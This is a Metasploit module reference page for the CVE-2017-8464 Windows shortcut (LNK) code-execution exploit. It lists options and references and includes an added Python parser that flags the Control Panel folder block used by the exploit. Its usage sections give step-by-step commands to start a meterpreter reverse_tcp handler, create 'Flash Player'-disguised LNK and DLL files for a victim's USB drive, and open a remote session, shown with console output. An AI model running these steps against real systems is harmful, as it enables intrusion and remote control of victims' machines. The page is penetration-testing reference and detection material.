LNK Code Execution Vulnerability - Metasploit
This page contains detailed information about how to use the exploit/windows/fileformat/cve_2017_8464_lnk_rce Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: LNK Code Execution Vulnerability
Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
Source code: modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
Disclosure date: 2017-06-13
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x86, x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2015-0096, CVE-2017-8464
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. If no PATH is specified, the module will use drive letters D through Z so the files may be placed in the root path of a drive such as a shared VM folder or USB drive.
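The description above names the structural tell of this variant: a SpecialFolderDataBlock in the shortcut's ExtraData section whose folder ID is the Control Panel, paired with an icon that resolves to a DLL. As an added example that is not part of this page or of the Metasploit module, the following Python script walks the shell link (MS-SHLLINK) structures of a .LNK file to the ExtraData section and reports whether such a block is present, together with the IconLocation string the shortcut would load its icon from. The two fixtures are constructed inside the script: they carry only a header, StringData and ExtraData, with no LinkTargetIDList, so they are parser test input rather than working shortcuts; the icon path D:\placeholder.cpl is a placeholder and CSIDL_CONTROLS (0x0003) is the Control Panel special folder ID from the Windows SDK.

```python
import struct

# Constants from MS-SHLLINK (shell link binary format), used to walk a .LNK file.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000C000000000000046")  # {00021401-0000-0000-C000-000000000046} as stored on disk

# LinkFlags bits (MS-SHLLINK 2.1.1); only those needed to reach the ExtraData section.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

SPECIAL_FOLDER_BLOCK_SIG = 0xA0000005  # BlockSignature of a SpecialFolderDataBlock
CSIDL_CONTROLS = 0x0003                # special folder ID of the Control Panel


def _read_string_data(data, off, flags):
    """Consume the StringData structures; return (new offset, dict of the strings present)."""
    strings = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, off)  # CountCharacters, not bytes
        off += 2
        if flags & IS_UNICODE:
            strings[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            strings[name] = data[off:off + count].decode("latin-1")
            off += count
    return off, strings


def parse_lnk(data):
    """Return the StringData dict and a list of (signature, payload) ExtraData blocks."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("file shorter than a shell link header")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip the IDList (2-byte size prefix)
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:                # skip LinkInfo (size includes itself)
        (link_info_size,) = struct.unpack_from("<I", data, off)
        off += link_info_size
    off, strings = _read_string_data(data, off, flags)
    blocks = []
    while off + 4 <= len(data):              # ExtraData: blocks until the TerminalBlock
        (block_size,) = struct.unpack_from("<I", data, off)
        if block_size < 4:
            break
        if block_size < 8 or off + block_size > len(data):
            raise ValueError("malformed ExtraData block at offset %d" % off)
        (signature,) = struct.unpack_from("<I", data, off + 4)
        blocks.append((signature, data[off + 8:off + block_size]))
        off += block_size
    return strings, blocks


def has_control_panel_folder_block(blocks):
    """True if any SpecialFolderDataBlock names the Control Panel as its folder."""
    for signature, payload in blocks:
        if signature == SPECIAL_FOLDER_BLOCK_SIG and len(payload) >= 4:
            (folder_id,) = struct.unpack_from("<I", payload, 0)
            if folder_id == CSIDL_CONTROLS:
                return True
    return False


def triage_lnk(data):
    """Summarise the indicators described above for one shortcut file."""
    strings, blocks = parse_lnk(data)
    return {
        "control_panel_block": has_control_panel_folder_block(blocks),
        "icon_location": strings.get("icon_location"),
        "block_signatures": [hex(sig) for sig, _ in blocks],
    }


def build_fixture(flags, strings, extra_blocks):
    """Constructed test fixture: header + StringData (in flag order) + ExtraData + TerminalBlock.
    It has no LinkTargetIDList, so it is parser input only, not a functioning shortcut."""
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, flags).ljust(LNK_HEADER_SIZE, b"\x00")
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return header + body + b"".join(extra_blocks) + struct.pack("<I", 0)


# Constructed fixtures: one carrying the Control Panel SpecialFolderDataBlock, one without.
SUSPECT_LNK = build_fixture(
    HAS_ICON_LOCATION | IS_UNICODE,
    ["D:\\placeholder.cpl"],  # placeholder icon path for the fixture
    [struct.pack("<IIII", 0x10, SPECIAL_FOLDER_BLOCK_SIG, CSIDL_CONTROLS, 0)],
)
BENIGN_LNK = build_fixture(HAS_NAME | IS_UNICODE, ["Ordinary shortcut"], [])

if __name__ == "__main__":
    for label, blob in (("suspect", SUSPECT_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_lnk(blob))
```

The script only reads bytes and never resolves the icon path, so it can be run over shortcuts collected from removable media or quarantine without touching the referenced DLL; a Control Panel SpecialFolderDataBlock combined with an icon location on a removable or shared drive letter is the combination worth escalating.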
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Stability:
- crash-service-restarts: Module may crash the service, but the service restarts.
Basic Usage
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > show targets
... a list of targets ...
msf exploit(cve_2017_8464_lnk_rce) > set TARGET target-id
msf exploit(cve_2017_8464_lnk_rce) > show options
... show and set options ...
msf exploit(cve_2017_8464_lnk_rce) > exploit
Knowledge Base
Vulnerable Application
This vulnerability affects any Windows version without the patch for CVE-2017-8464. The exploit does not appear to work with UNC paths, so the exploit DLL file needs to be on a local file system or a USB drive. A fix was released in the June 2017 Patch Tuesday.
Vulnerable Setup
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.
Verification Steps
Start a handler
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [ip victim connects back to]
exploit -j
Run the exploit
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [ip victim connects back to]
exploit
Copy files to USB drive & open on vulnerable system
cp /root/.msf4/local/* [USB drive path]
- Insert device in target machine and browse to it
Options
FILENAME
The file name of the LNK file. This file name can be renamed later. If the value is not set, a random name will be generated.
DLLNAME
The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated.
DRIVE
Drive letter assigned to the USB drive on the victim's machine. If not set, LNK files for drives D through Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered.
Windows 10 x64 (Build 14393)
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Starting the payload handler...
msf exploit(handler) > back
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(cve_2017_8464_lnk_rce) > exploit
msf exploit(cve_2017_8464_lnk_rce) > exploit
[*] /root/.msf4/local/kNgYlztVprHPOmHY.dll created, copy it to the root folder of the target USB drive
[*] /root/.msf4/local/SoXXZhgCWEDkbDyA_D.lnk created, copy to the target USB drive
[*] /root/.msf4/local/rfuSAlSFEPmrgsBh_E.lnk created, copy to the target USB drive
[*] /root/.msf4/local/LydLhRBovVRINgUh_F.lnk created, copy to the target USB drive
[*] /root/.msf4/local/xbpnlkcQOYonGpKW_G.lnk created, copy to the target USB drive
[*] /root/.msf4/local/SezkrIUwqIVvMiOZ_H.lnk created, copy to the target USB drive
[*] /root/.msf4/local/UzsJRIdcpoZPpLEj_I.lnk created, copy to the target USB drive
[*] /root/.msf4/local/BxTkakFYhUaxSNyi_J.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dPdanTusElQRKzGZ_K.lnk created, copy to the target USB drive
[*] /root/.msf4/local/cKUaDslpjLshMEpP_L.lnk created, copy to the target USB drive
[*] /root/.msf4/local/RQPOxJeuGqVCQGNB_M.lnk created, copy to the target USB drive
[*] /root/.msf4/local/tLDnpaeIeUavIxqP_N.lnk created, copy to the target USB drive
[*] /root/.msf4/local/VVQOvhpqJYbhINIX_O.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dAIEBrbaixsXjnnm_P.lnk created, copy to the target USB drive
[*] /root/.msf4/local/AoHnIQhKkpnYSOZR_Q.lnk created, copy to the target USB drive
[*] /root/.msf4/local/kZCCppTXKsuGRSCB_R.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vMBPqzoOEoJXhZqQ_S.lnk created, copy to the target USB drive
[*] /root/.msf4/local/ueCsaNzVsljfHKnS_T.lnk created, copy to the target USB drive
[*] /root/.msf4/local/TSCgPoYrFFnZqMsl_U.lnk created, copy to the target USB drive
[*] /root/.msf4/local/QFbXkQeBmCvXezNg_V.lnk created, copy to the target USB drive
[*] /root/.msf4/local/liPaOopqYJbBIrVY_W.lnk created, copy to the target USB drive
[*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
[*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
msf exploit(cve_2017_8464_lnk_rce) >
[*] Sending stage (1189423 bytes) to 192.168.146.193
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-5G8HK7E
OS : Windows 10 (Build 14393).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
Msfconsole Usage
Here is how the windows/fileformat/cve_2017_8464_lnk_rce exploit module looks in the msfconsole:
msf6 > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show info
Name: LNK Code Execution Vulnerability
Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
Platform: Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2017-06-13
Provided by:
Uncredited
Yorick Koster
Spencer McIntyre
Module stability:
crash-service-restarts
Available targets:
Id  Name
--  ----
0   Automatic
1   Windows x64
2   Windows x86
Check supported:
No
Basic options:
Name      Current Setting        Required  Description
----      ---------------        --------  -----------
DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
FILENAME  Flash Player.lnk       no        The LNK file
PATH                             no        An explicit path to where the files will be hosted
Payload information:
Space: 2048
Description:
This module exploits a vulnerability in the handling of Windows
Shortcut files (.LNK) that contain a dynamic icon, loaded from a
malicious DLL. This vulnerability is a variant of MS15-020
(CVE-2015-0096). The created LNK file is similar except an
additional SpecialFolderDataBlock is included. The folder ID set in
this SpecialFolderDataBlock is set to the Control Panel. This is
enough to bypass the CPL whitelist. This bypass can be used to trick
Windows into loading an arbitrary DLL file. If no PATH is specified,
the module will use drive letters D through Z so the files may be
placed in the root path of a drive such as a shared VM folder or USB
drive.
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-8464
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
https://msdn.microsoft.com/en-us/library/dd871305.aspx
http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
Module Options
This is a complete list of options available in the windows/fileformat/cve_2017_8464_lnk_rce exploit:
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show options
Module options (exploit/windows/fileformat/cve_2017_8464_lnk_rce):
Name      Current Setting        Required  Description
----      ---------------        --------  -----------
DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
FILENAME  Flash Player.lnk       no        The LNK file
PATH                             no        An explicit path to where the files will be hosted
Exploit target:
Id  Name
--  ----
0   Automatic
Advanced Options
Here is a complete list of advanced options supported by the windows/fileformat/cve_2017_8464_lnk_rce exploit:
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show advanced
Module advanced options (exploit/windows/fileformat/cve_2017_8464_lnk_rce):
Name                    Current Setting               Required  Description
----                    ---------------               --------  -----------
ContextInformationFile                                no        The information file that contains context information
DisablePayloadHandler   true                          no        Disable the handler code for the selected payload
EXE::Custom                                           no        Use custom exe instead of automatically generating a payload exe
EXE::EICAR              false                         no        Generate an EICAR file instead of regular payload exe
EXE::FallBack           false                         no        Use the default template in case the specified one is missing
EXE::Inject             false                         no        Set to preserve the original EXE function
EXE::OldMethod          false                         no        Set to use the substitution EXE generation method.
EXE::Path                                             no        The directory in which to look for the executable template
EXE::Template                                         no        The executable template file name.
EnableContextEncoding   false                         no        Use transient context when encoding payloads
LnkComment              Manage Flash Player Settings  yes       The comment to use in the generated LNK file
LnkDisplayName          Flash Player                  yes       The display name to use in the generated LNK file
MSI::Custom                                           no        Use custom msi instead of automatically generating a payload msi
MSI::EICAR              false                         no        Generate an EICAR file instead of regular payload msi
MSI::Path                                             no        The directory in which to look for the msi template
MSI::Template                                         no        The msi template file name
MSI::UAC                false                         no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE                 false                         no        Enable detailed status messages
WORKSPACE                                             no        Specify the workspace for this module
WfsDelay                2                             no        Additional delay in seconds to wait for a session
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/fileformat/cve_2017_8464_lnk_rce module can exploit:
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show targets
Exploit targets:
Id  Name
--  ----
0   Automatic
1   Windows x64
2   Windows x86
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/fileformat/cve_2017_8464_lnk_rce exploit:
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show payloads
Evasion Options
Here is the full list of possible evasion options supported by the windows/fileformat/cve_2017_8464_lnk_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #12205 Merged Pull Request: Update module and generate splats from http:// to https://
- #10873 Merged Pull Request: Add applicable notes to my exploit modules
- #9041 Merged Pull Request: Add an LPE Version Of CVE-2017-8464
- #9032 Merged Pull Request: Update the CVE-2017-8464 module
- #8960 Merged Pull Request: spelling/grammar fixes part 3
- #8767 Merged Pull Request: Add exploit module for CVE-2017-8464 LNK Code Execution Vulnerability
References
- CVE-2017-8464
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
- http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
- https://msdn.microsoft.com/en-us/library/dd871305.aspx
- http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
See Also
Check also the following modules related to this module:
- exploit/windows/local/cve_2017_8464_lnk_lpe
- exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader
- exploit/windows/smb/ms15_020_shortcut_icon_dllloader
- exploit/windows/dcerpc/cve_2021_1675_printnightmare
- exploit/windows/local/cve_2018_8453_win32k_priv_esc
- exploit/windows/local/cve_2019_1458_wizardopium
- exploit/windows/local/cve_2020_0668_service_tracing
- exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
- exploit/windows/local/cve_2020_0796_smbghost
- exploit/windows/local/cve_2020_1048_printerdemon
- exploit/windows/local/cve_2020_1054_drawiconex_lpe
- exploit/windows/local/cve_2020_1313_system_orchestrator
- exploit/windows/local/cve_2020_1337_printerdemon
- exploit/windows/local/cve_2020_17136
- exploit/windows/local/cve_2021_1732_win32k
- exploit/windows/local/cve_2021_21551_dbutil_memmove
- exploit/windows/local/cve_2021_40449
- exploit/windows/local/cve_2022_21882_win32k
- exploit/windows/local/cve_2022_21999_spoolfool_privesc
- exploit/windows/local/cve_2022_26904_superprofile
- exploit/windows/misc/cve_2022_28381_allmediaserver_bof
- exploit/windows/rdp/cve_2019_0708_bluekeep_rce
- exploit/windows/smb/cve_2020_0796_smbghost
- exploit/linux/http/cve_2019_1663_cisco_rmi_rce
- exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
- exploit/linux/local/cve_2021_3493_overlayfs
- exploit/linux/local/cve_2021_38648_omigod
- exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
- exploit/linux/local/cve_2022_0847_dirtypipe
- exploit/linux/local/cve_2022_0995_watch_queue
- exploit/linux/misc/cve_2020_13160_anydesk
- exploit/linux/misc/cve_2021_38647_omigod
- exploit/multi/http/cve_2021_35464_forgerock_openam
- exploit/multi/sap/cve_2020_6207_solman_rs
Related Nessus plugins:
- MS15-020: Vulnerabilities in Microsoft Windows Could Allow Remote Code Execution (3041836) (EASYHOOKUP)
- KB4022714: Windows 10 Version 1511 June 2017 Cumulative Update
- KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 Cumulative Update
- Windows 7 and Windows Server 2008 R2 June 2017 Security Updates
- Windows Server 2012 June 2017 Security Updates
- KB4022725: Windows 10 Version 1703 June 2017 Cumulative Update
- Windows 8.1 and Windows Server 2012 R2 June 2017 Security Updates
- KB4022727: Windows 10 Version 1507 June 2017 Cumulative Update
- Microsoft Security Advisory 4025685: Windows Vista (June 2017)
- Windows 2008 June 2017 Multiple Security Updates
Authors
- Uncredited
- Yorick Koster
- Spencer McIntyre
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.